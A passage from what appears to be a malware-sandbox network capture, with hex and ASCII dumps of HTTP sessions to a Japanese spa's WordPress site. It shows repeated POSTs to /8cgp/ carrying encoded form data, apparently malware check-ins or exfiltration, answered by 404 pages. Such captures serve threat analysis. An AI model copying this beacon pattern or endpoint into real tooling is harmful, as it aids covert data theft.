e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78
                                                                    Data Ascii: 3b58<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="tex
                                                                    Apr 24, 2024 12:32:53.867913008 CEST1289INData Raw: 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77
                                                                    Data Ascii: t/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji"
                                                                    Apr 24, 2024 12:32:53.867964029 CEST1289INData Raw: 22 65 6d 6f 6a 69 22 3a 72 65 74 75 72 6e 21 6e 28 65 2c 22 5c 75 64 38 33 65 5c 75 64 65 66 31 5c 75 64 38 33 63 5c 75 64 66 66 62 5c 75 32 30 30 64 5c 75 64 38 33 65 5c 75 64 65 66 32 5c 75 64 38 33 63 5c 75 64 66 66 66 22 2c 22 5c 75 64 38 33
                                                                    Data Ascii: "emoji":return!n(e,"\ud83e\udef1\ud83c\udffb\u200d\ud83e\udef2\ud83c\udfff","\ud83e\udef1\ud83c\udffb\u200b\ud83e\udef2\ud83c\udfff")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new
                                                                    Apr 24, 2024 12:32:53.867975950 CEST1289INData Raw: 65 77 20 57 6f 72 6b 65 72 28 55 52 4c 2e 63 72 65 61 74 65 4f 62 6a 65 63 74 55 52 4c 28 72 29 2c 7b 6e 61 6d 65 3a 22 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73
                                                                    Data Ascii: ew Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.suppo
                                                                    Apr 24, 2024 12:32:53.867985964 CEST1289INData Raw: 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 6c 69 62 72 61 72 79 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 63 73 73
                                                                    Data Ascii: esheet' id='wp-block-library-css' href='http://a-two-spa-salon.com/wp-includes/css/dist/block-library/style.min.css?ver=6.4.4' type='text/css' media='all' /><style id='classic-theme-styles-inline-css' type='text/css'>/*! This file is auto-ge
                                                                    Apr 24, 2024 12:32:53.867997885 CEST1289INData Raw: 79 61 6e 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 31 32 32 2c 32 32 30 2c 31 38 30 29 20 30 25 2c 72 67 62 28 30 2c 32 30 38 2c 31 33 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d
                                                                    Data Ascii: yan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vi
                                                                    Apr 24, 2024 12:32:53.868019104 CEST1289INData Raw: 65 67 2c 72 67 62 28 32 2c 33 2c 31 32 39 29 20 30 25 2c 72 67 62 28 34 30 2c 31 31 36 2c 32 35 32 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 3a 20 31 33 70 78 3b 2d 2d 77 70
                                                                    Data Ascii: eg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--sp
                                                                    Apr 24, 2024 12:32:53.868030071 CEST1289INData Raw: 69 6e 2d 69 6e 6c 69 6e 65 2d 73 74 61 72 74 3a 20 32 65 6d 3b 6d 61 72 67 69 6e 2d 69 6e 6c 69 6e 65 2d 65 6e 64 3a 20 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 63 6f 6e 73 74 72 61 69 6e 65 64 20 3e 20 2e 61 6c 69 67 6e 63 65 6e
                                                                    Data Ascii: in-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width
                                                                    Apr 24, 2024 12:32:53.868042946 CEST1289INData Raw: 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f
                                                                    Data Ascii: et--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivi
                                                                    Apr 24, 2024 12:32:53.868053913 CEST1289INData Raw: 64 2d 61 6d 62 65 72 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28
                                                                    Data Ascii: d-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important
                                                                    Apr 24, 2024 12:32:54.147511005 CEST1289INData Raw: 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 62 6f 72 64
                                                                    Data Ascii: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-b


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    63192.168.11.2050308157.7.107.6380
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:56.186144114 CEST1020OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 542
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.a-two-spa-salon.com
                                                                    Origin: http://www.a-two-spa-salon.com
                                                                    Referer: http://www.a-two-spa-salon.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 31 45 47 6f 64 74 49 5a 47 34 6c 43 43 69 4c 31 55 5a 6b 34 75 2b 43 36 48 4e 42 38 36 36 43 35 57 59 4c 33 63 49 6e 78 35 4b 38 71 4a 4f 4e 50 33 4b 79 6a 51 53 65 59 31 33 64 54 66 37 46 79 5a 6e 47 37 74 65 50 62 2f 5a 59 31 52 77 34 69 41 69 37 2f 68 52 37 53 4a 47 4c 75 4c 62 5a 36 44 72 64 71 30 61 63 38 30 50 54 30 76 61 50 4e 4c 31 44 59 44 58 7a 59 76 68 4e 6e 43 61 2b 76 4c 2f 61 72 62 63 2b 58 6b 36 54 78 37 7a 79 76 68 41 6c 51 63 59 53 4d 75 45 33 73 42 6f 47 53 57 70 74 43 6e 4e 67 48 41 4d 63 70 59 46 42 70 74 49 4f 44 47 4f 35 37 78 46 65 68 47 64 6e 32 78 36 4a 53 57 43 39 50 70 71 77 64 4f 42 6e 6f 67 33 54 71 52 59 66 39 67 38 52 4a 59 5a 35 47 65 65 52 55 56 4d 55 5a 51 56 34 61 4b 64 33 59 41 73 62 5a 55 33 43 55 35 59 78 53 68 51 2f 76 78 38 54 64 35 35 6f 72 55 30 4c 66 62 48 2b 34 36 51 6c 31 66 6f 2f 59 4e 6f 74 6d 4b 43 48 4b 30 72 46 38 30 52 48 61 30 78 54 4e 69 70 76 39 6f 53 31 4c 2f 59 49 67 4e 58 78 6e 6b 4d 68 69 37 6f 77 70 4c 36 57 48 79 65 77 53 56 4c 6f 4f 56 62 76 6b 41 77 2b 78 51 42 6c 4a 79 4c 4a 48 75 53 6e 30 67 68 33 6f 45 70 6b 38 30 37 4e 4e 63 31 6f 73 48 54 69 39 53 51 4d 45 5a 6a 62 2b 35 59 6c 34 47 39 69 6b 31 77 76 5a 59 7a 4f 42 47 33 7a 73 33 33 2f 43 59 65 30 45 59 42 44 58 72 77 6a 62 66 47 4a 74 50 56 4f 4a 6d 75 6a 52 59 33 53 4d 6d 77 2b 73 53 6f 77 47 68 78 6a 32 32 73 32 39 6e 4c 79 4a 67 52 48 71 33 55 4b 74 45 4a 43 72 67 30 74 4a 69 46 56 6d 75 34 2f 65 58 73 38 52 48 38 4f 42 63 47 55 6e 62 38 45 31 51 4e 7a 42 34 31 35 42 39 6f 4e 76 4e 52 77 78 44 76 30 52 44 70 4e 36 72 68 32 54 42 31 76 63 6e 51 39 37 43 42 73 3d
                                                                    Data Ascii: Xh9lX=1EGodtIZG4lCCiL1UZk4u+C6HNB866C5WYL3cInx5K8qJONP3KyjQSeY13dTf7FyZnG7tePb/ZY1Rw4iAi7/hR7SJGLuLbZ6Drdq0ac80PT0vaPNL1DYDXzYvhNnCa+vL/arbc+Xk6Tx7zyvhAlQcYSMuE3sBoGSWptCnNgHAMcpYFBptIODGO57xFehGdn2x6JSWC9PpqwdOBnog3TqRYf9g8RJYZ5GeeRUVMUZQV4aKd3YAsbZU3CU5YxShQ/vx8Td55orU0LfbH+46Ql1fo/YNotmKCHK0rF80RHa0xTNipv9oS1L/YIgNXxnkMhi7owpL6WHyewSVLoOVbvkAw+xQBlJyLJHuSn0gh3oEpk807NNc1osHTi9SQMEZjb+5Yl4G9ik1wvZYzOBG3zs33/CYe0EYBDXrwjbfGJtPVOJmujRY3SMmw+sSowGhxj22s29nLyJgRHq3UKtEJCrg0tJiFVmu4/eXs8RH8OBcGUnb8E1QNzB415B9oNvNRwxDv0RDpN6rh2TB1vcnQ97CBs=
                                                                    Apr 24, 2024 12:32:56.693330050 CEST1289INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 24 Apr 2024 10:32:56 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: close
                                                                    Server: Apache
                                                                    X-Powered-By: PHP/8.2.18
                                                                    Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                    Cache-Control: no-cache, must-revalidate, max-age=0
                                                                    Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                                    Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 20 26 72 61 71 75 6f 3b 20 e3 82 b3 e3 83 a1 e3 83 b3 e3 83 88 e3 83 95 e3 82 a3 e3 83 bc e3 83 89 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74
                                                                    Data Ascii: 451<!DOCTYPE html><html class="pc" lang="ja"><head><meta charset="UTF-8">...[if IE]><meta http-equiv="X-UA-Compatible" content="IE=edge"><![endif]--><meta name="viewport" content="width=device-width"><title> | A-two </title><meta name="description" content=""><link rel="pingback" href="http://a-two-spa-salon.com/xmlrpc.php"><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//a-two-spa-salon.com' /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/feed/" /><link rel="alternate" type="application/rss+xml" title="A-two &raquo; " href="http://a-two-spa-salon.com/comments/feed/" /><script type="text
                                                                    Apr 24, 2024 12:32:56.693341970 CEST179INData Raw: 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e
                                                                    Data Ascii: /javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/co
                                                                    Apr 24, 2024 12:32:56.693352938 CEST1289INData Raw: 62 35 30 0d 0a 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 73 76 67 5c 2f 22 2c 22 73 76 67 45 78 74 22 3a 22 2e 73 76 67 22 2c 22 73 6f 75 72 63 65 22 3a 7b 22 63 6f 6e 63 61 74 65 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 61
                                                                    Data Ascii: b50re\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/a-two-spa-salon.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.4.4"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={s
                                                                    Apr 24, 2024 12:32:56.693366051 CEST1289INData Raw: 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 26 26 73 65 6c 66 20 69 6e 73 74 61 6e 63 65 6f 66 20 57 6f 72 6b 65 72 47 6c 6f 62 61 6c 53 63 6f 70 65 3f 6e 65 77 20 4f 66 66 73 63 72 65 65 6e 43 61
                                                                    Data Ascii: ined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(functio
                                                                    Apr 24, 2024 12:32:56.693387985 CEST325INData Raw: 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 65 29 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69
                                                                    Data Ascii: ion(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everyth
                                                                    Apr 24, 2024 12:32:56.693398952 CEST1289INData Raw: 35 32 31 0d 0a 61 64 79 3d 21 30 7d 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 29 2e 74 68 65 6e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68
                                                                    Data Ascii: 521ady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSet
                                                                    Apr 24, 2024 12:32:56.693407059 CEST31INData Raw: 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 0d 0a
                                                                    Data Ascii: xt-decoration:none}</style>
                                                                    Apr 24, 2024 12:32:56.694730043 CEST1289INData Raw: 35 61 32 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f
                                                                    Data Ascii: 5a2<style id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color-
                                                                    Apr 24, 2024 12:32:56.694739103 CEST160INData Raw: 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 37 34 2c 32 33 34 2c 32 32 30 29 20 30 25 2c 72 67 62 28 31 35 31 2c 31 32 30 2c 32 30 39 29 20 32 30 25 2c 72 67 62 28 32 30 37 2c 34 32 2c 31 38 36 29 20 34 30 25 2c 72 67 62 28 32 33 38
                                                                    Data Ascii: radient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradien
                                                                    Apr 24, 2024 12:32:56.709642887 CEST1289INData Raw: 32 30 66 34 0d 0a 74 2d 2d 62 6c 75 73 68 2d 6c 69 67 68 74 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35
                                                                    Data Ascii: 20f4t--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--lu
                                                                    Apr 24, 2024 12:32:56.963104010 CEST1289INData Raw: 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 63 72 69 73 70 3a 20 36 70 78 20 36
                                                                    Data Ascii: gba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-star


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    64192.168.11.2050309157.7.107.6380
                                                                    TimestampBytes transferredDirectionData
                                                                    Apr 24, 2024 12:32:58.983531952 CEST2578OUTPOST /8cgp/ HTTP/1.1
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Cache-Control: max-age=0
                                                                    Content-Length: 52930
                                                                    Connection: close
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: www.a-two-spa-salon.com
                                                                    Origin: http://www.a-two-spa-salon.com
                                                                    Referer: http://www.a-two-spa-salon.com/8cgp/
                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101 Firefox/38.0
                                                                    Data Raw: 58 68 39 6c 58 3d 31 45 47 6f 64 74 49 5a 47 34 6c 43 43 69 4c 31 55 5a 6b 34 75 2b 43 36 48 4e 42 38 36 36 43 35 57 59 4c 33 63 49 6e 78 35 4a 63 71 4a 64 31 50 31 71 4f 6a 52 53 65 59 38 58 64 57 66 37 45 75 5a 6e 2b 42 74 65 7a 55 2f 61 77 31 51 6a 77 69 41 51 6a 2f 72 78 37 52 56 57 4c 6f 64 72 59 74 44 71 68 2b 30 61 35 4c 7a 38 50 30 39 49 58 4e 4d 43 66 62 66 58 7a 65 76 68 4e 72 47 61 2b 4e 4c 2f 66 77 62 63 79 58 6b 34 6e 78 36 42 4b 76 79 42 6c 51 49 34 53 54 67 6b 33 76 59 34 47 6e 57 70 4a 38 6e 4e 67 78 41 4e 59 70 59 43 4e 70 75 4c 57 41 46 75 35 37 76 56 65 75 55 74 6a 79 78 36 46 61 57 47 31 50 70 70 41 64 4e 68 6e 6f 6c 53 6e 70 57 34 66 42 33 73 52 6b 54 35 31 4f 65 65 46 36 56 4e 77 5a 51 6c 38 61 4c 75 66 59 54 65 7a 5a 58 58 43 42 30 34 78 4e 34 41 2b 75 78 38 44 42 35 34 49 37 55 33 48 66 4a 56 6d 34 6f 44 39 30 49 34 2b 54 49 6f 73 2b 4f 43 4c 4f 30 72 56 61 30 52 48 77 30 77 48 4e 69 5a 2f 39 70 57 70 4b 38 49 49 6a 55 48 78 75 75 73 64 38 37 6f 73 78 4c 35 57 58 79 64 63 53 55 72 6f 4f 51 36 76 6e 56 51 2b 79 50 52 6c 58 73 37 4a 51 75 53 72 43 67 69 37 65 45 64 63 38 32 4c 39 4e 50 31 6f 72 57 44 69 35 49 67 4d 43 53 44 62 2b 35 59 70 47 47 39 75 6b 31 42 6e 5a 4b 52 57 42 44 67 76 73 31 33 2f 4d 59 65 30 56 59 42 65 70 72 77 71 4b 66 46 42 4c 50 58 69 4a 6a 76 54 52 5a 44 2b 50 6a 41 2b 54 57 6f 77 56 2b 68 75 30 32 76 53 31 6e 4c 44 2b 67 47 33 71 32 55 61 74 4f 70 43 71 6d 55 74 45 71 6c 55 6c 35 4a 44 61 58 73 68 6b 48 2f 54 47 63 45 55 6e 59 35 73 71 4b 4d 48 58 6c 45 4e 42 34 38 5a 70 42 77 73 77 41 65 30 75 4d 71 68 48 70 6e 36 52 45 46 37 47 79 31 78 47 64 33 65 4d 55 58 4b 33 38 37 45 66 58 43 2b 6f 6d 46 6a 72 4e 62 4c 73 70 39 79 6b 57 36 70 36 6a 71 74 4d 62 61 73 54 64 57 47 33 4f 54 43 49 6f 75 4e 55 36 6c 73 34 54 44 41 2b 70 77 59 4f 58 44 30 6f 5a 73 64 6d 70 4d 4c 63 76 4d 33 48 5a 30 4c 38 34 47 61 70 65 77 54 35 44 61 56 57 46 6d 39 68 30 76 6e 43 66 67 6a 55 6e 49 63 56 57 4f 5a 75 31 6b 6d 36 51 57 63 43 63 32 4a 4b 6e 6e 6e 4a 66 5a 4b 7a 69 34 59 50 43 41 4c 77 42 68 79 48 72 6a 73 6c 55 46 62 36 5a 49 6d 5a 78 4b 72 62 72 6d 78 51 